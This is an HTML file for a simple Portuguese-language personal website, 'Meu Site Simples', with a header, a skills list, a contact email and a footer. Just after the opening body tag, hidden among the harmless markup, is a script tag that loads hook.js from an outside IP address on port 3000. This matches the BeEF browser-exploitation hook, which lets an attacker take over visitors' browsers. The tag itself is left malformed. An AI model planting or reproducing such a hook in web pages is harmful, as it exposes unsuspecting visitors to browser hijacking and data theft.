<!DOCTYPE html>
<html lang="pt-br">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Meu Site Simples</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            background-color: #f0f0f0;
        }
        header {
            background-color: #4CAF50;
            color: white;
            padding: 15px;
            text-align: center;
        }
        main {
            padding: 20px;
        }
        footer {
            background-color: #4CAF50;
            color: white;
            text-align: center;
            padding: 10px;
            position: fixed;
            width: 100%;
            bottom: 0;
        }
        ul {
            list-style-type: square;
        }
    </style>
</head>
<body>
<script src="http://<IP>:3000/hook.js"></script
    <header>
        <h1>Bem-vindo ao Meu Site!</h1>
    </header>

    <main>
        <h2>Sobre</h2>
        <p>Este é um site simples criado com HTML e CSS.</p>

        <h3>Minhas Habilidades:</h3>
        <ul>
            <li>HTML</li>
            <li>CSS</li>
            <li>JavaScript</li>
        </ul>

        <h3>Contato:</h3>
        <p>Email: exemplo@dominio.com</p>
    </main>

    <footer>
        <p>&copy; 2024 Meu Site Simples. Todos os direitos reservados.</p>
    </footer>

</body>
</html>
